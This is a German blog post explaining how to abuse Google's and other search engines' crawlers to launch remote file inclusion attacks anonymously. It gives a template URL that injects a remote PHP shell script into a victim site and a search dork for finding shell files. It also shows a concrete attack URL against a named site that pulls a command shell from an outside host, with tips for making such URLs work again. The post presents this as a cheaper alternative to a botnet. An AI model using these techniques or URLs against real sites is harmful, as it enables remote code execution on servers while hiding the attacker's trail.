Auf dem Blog "Stephans Home" bin ich auf einen Interessante, jedoch ältere Möglichkeit gestossen um Webseiten automatisch zu exploiten. Diese Möglichkeit beschreibt wie man andere für sich die Arbeit erledigen lässt Genau nach diesem Motto, hat der SecuriTeam Blog eine Methode beschrieben, URL-basierte Exploits von anderen ausführen zu lassen, anstatt den entsprechend präparierten Link selbst aufzurufen und somit Spuren zu hinterlassenm, setzten sie den Link kurzer Hand auf eine Webseite und warten darauf, das ein argloser Benutzer oder einer der vielen Suchmachinen Roboter die URL aufruft und indexiert.

Die Autoren von SecuriTeam haben es erfolgreich mit Google getestet - natürlich funktioniert es mit jedem beliebigen Web Spider. Ein kleines Manko am Artikel ist, wie Stefan in seinem Beitrag schon beschrieben hat, ist das die Autoren nicht auf den Referer-Header eingeht. Google lässt den Referer Header weg, andere Spider und Benutzer verfahren unter Umständen anders. Anhand des Referer Header kann man nachvollziehen woher der Link stammt und woher die Angriffsquelle letztenendes hergekommen ist.

Wer gerne wissen möchte wie man so eine Attacke macht, liest am besten weiter.

Verfahren kurz erklärt:

Google kann dazu missbraucht werden um sich in Webseiten zu hacken - also aktiv exploiten, nicht nur informationen sammel via "Google hacking", es ist anzumerken das via Google hacking die meisten Vulnerablen Webseiten gefunden werden können.

Das ganze gschieht indem man eine URL auf irgendeiner Webseite platziert, Google findet es, besucht diese Seite und indexiert sie anschliessend. Mit diesem Mechanismus ist es möglich anonymisierte Attacken auf andere Webseiten durchzuführen mit Hilfe des Google Crawlers.

Um die Attacke überhaupt durchführen zu könne, muss der Angreifer Links erstellen die ungefähr so aufgebaut sind:

• URL zur Webseite die angegriffen werden soll
• Datei Include ExploitFile inclusion exploit
• 2. URL mit einem bösartigen PHP Shell Script

Beispiel einer URL:

http://Webseite-des-Opfers.com/RFI-exploit?http://Webseite-mit-bösartigem-shell-script.php

Google nimmt die URL auf, besucht die Seite und indexiert die Seite schön für uns, das ganze Vollautomatisch Beim Aufruf der Webseite durch Google wird die Webseite des Opfers automatisch durch Google Angegriffen. Das ist ein Feature und kein Bug :p

Beispiel

Suche in Google nach z.B:inurl:cmd.gifBeachte, dass die URL auch wirklich stimmt, und nicht durch Sonderzeichen erstetzt wird, wie im folgenden Beispiel:www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd

Diese URL ist nicht mehr angreifbar. Die Leerzeichen "%20" gehören da nicht hin, die Leerzeichen wurden automatisch durch Google ersetzt. Diese Zeichen muss man von Hand wieder ersetzen durch die Normalen URL Zeichen.

Warum ein Botnetz benutzen wen du die Google Crawler missbrauchen kannst, welche ohnehin von fast allen Firmen, Webseiten zugelassen wird?

kleine Bemerkungen am Schluss:

• Diese Attacke wurde mit Google verifiziert, es gibt jedoch kein Grund warum es nicht auch mit anderen Suchmachinen, Crawler und WebSpider gehen würde.
• Datei Einbindung scheint nicht mehr überall gut zu funktionieren mit dieser anonymisierten Methode. Es ist aber durchaus möglich das man andere Angriffszenarien via Google anonym durchführen kann.
• Dieses Feature kann möglicherweise auch benutzt werden um eine Anonyme Kommunikation zu erlauben, als eine Art versteckte Botschaft.

Das könnte dich auch interessieren:

• 100,000 Websiten wurden nicht durch HyperVM 0day gehackt?
• Howto Live Video Stream vom heutigen Apple Event unter Windows und Linux ansehen
• Apple bietet Live Video Stream vom heutigen Event an
• Ultrasn0w funktioniert nicht mehr beim neuen Baseband 05.14.01
• Google Image Search UI für Smartphones verbessert